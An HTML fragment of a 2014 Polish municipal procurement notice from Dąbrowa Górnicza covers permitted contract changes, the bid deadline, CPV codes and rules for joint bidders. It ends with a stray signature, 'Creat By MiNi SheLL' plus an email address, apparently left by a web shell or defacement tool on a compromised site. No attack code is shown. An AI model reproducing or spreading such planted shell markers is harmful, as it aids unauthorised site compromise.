<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje  możliwość dokonania istotnych zmian  postanowień zawartej umowy w  stosunku do treści  oferty, na podstawie której  dokonano wyboru Wykonawcy, w zakresie:
1. zmiany terminu wykonania zamówienia w następujących przypadkach:
1.1. w zakresie zmiany terminu wykonania zamówienia, na skutek  siły wyższej co oznacza wydarzenie nieprzewidywalne  i poza kontrolą stron niniejszej umowy, występujące po podpisaniu umowy, a powodujące niemożliwość wywiązania się z umowy w jej obecnym brzmieniu;
2. w pozostałym zakresie zmiany do umowy mogą dotyczyć następujących okoliczności:
2.1. zmian przepisów prawa istotnych dla zawartej umowy,
2.2. zmiany stawki podatku  VAT:
2.2.1. W przypadku zwiększenia  stawki podatku  VAT- wartość  wynagrodzenia    brutto  nie ulegnie zmianie  w okresie obowiązywania umowy
2.2.2. W przypadku zmniejszenia stawki podatku  VAT - wartość wynagrodzenia brutto  zostanie pomniejszona z odpowiednim zastosowaniem zmniejszonej stawki podatku VAT</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.dabrowa-gornicza.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Dąbrowie Górniczej, ul. Graniczna 21, Wydział Gospodarki Komunalnej i Mieszkaniowej, III piętro, pokój nr 315.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.06.2014 godzina 09:30, miejsce: Urząd  Miejski w Dąbrowie Górniczej, ul. Graniczna 21, parter, stanowisko nr 13 - INFORMACJA.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Zamówienie nie jest finansowane ze środków Unii Europejskiej -/dot. Zadania A do E/ 2. Uszczegółowienie sekcji II.1.6) WSPÓLNY SŁOWNIK ZAMÓWIEŃ (CPV): Zadanie A
Przedmiot główny:       39113600-3	             Zadanie B
Przedmiot główny:       
34928480-6 
Przedmioty dodatkowe:
44114200-4 	Produkty betonowe
Zadanie C
Przedmiot główny:       
39113600-3	            

Przedmioty dodatkowe:       
34928480-6 	
44114200-4 	

Zadanie D
Przedmiot główny:       
39113600-3	          

Przedmioty dodatkowe:       
34928480-6 	
44114200-4 	

Zadanie E
Przedmiot główny:       
39113600-3	      

Przedmioty dodatkowe:       
44114200-4	
37410000-5	

3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia-/dot. Zadania A do E/
3.1. Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia powinni spełniać warunki udziału w postępowaniu określone w punkcie 8 SIWZ oraz złożyć dokumenty i oświadczenia potwierdzające spełnianie tych warunków zgodnie z zapisami zawartymi w punkcie 9 SIWZ.
3.2. W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch  lub więcej Wykonawców, w ofercie muszą być złożone dokumenty i oświadczenia wymienione w pkt   9.2. SIWZ przez każdego z nich. Dokument wymieniony w  pkt. 9.3.  SIWZ  każdy z Wykonawców składa oddzielnie. 
3.3.Dokumenty i oświadczenia wymienione w  pkt. 9.1.2 i 9.1.3 SIWZ Wykonawcy składają wspólnie.
Oświadczenie wymienione w pkt. 9.1.1. SIWZ, formularz ofertowy wymieniony w pkt. 9.4.1. SIWZ winny być podpisane przez uprawnionych przedstawicieli Wykonawców. Oświadczenia na podstawie art. 22 ust. 1 Ustawy (załącznik nr 2 do SIWZ) składają  wszyscy wykonawcy wspólnie na jednym druku lub pełnomocnik.
3.4. Ponadto ww. Wykonawcy ustanawiają Pełnomocnika do reprezentowania ich w niniejszym postępowaniu albo reprezentowania ich w postępowania i zawarcia umowy w sprawie zamówienia publicznego. 
3.5. Wszelka korespondencja prowadzona będzie wyłącznie z  Pełnomocnikiem.
4. Zamawiający nie wymaga wniesienia zabezpieczenia należytego wykonania umowy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com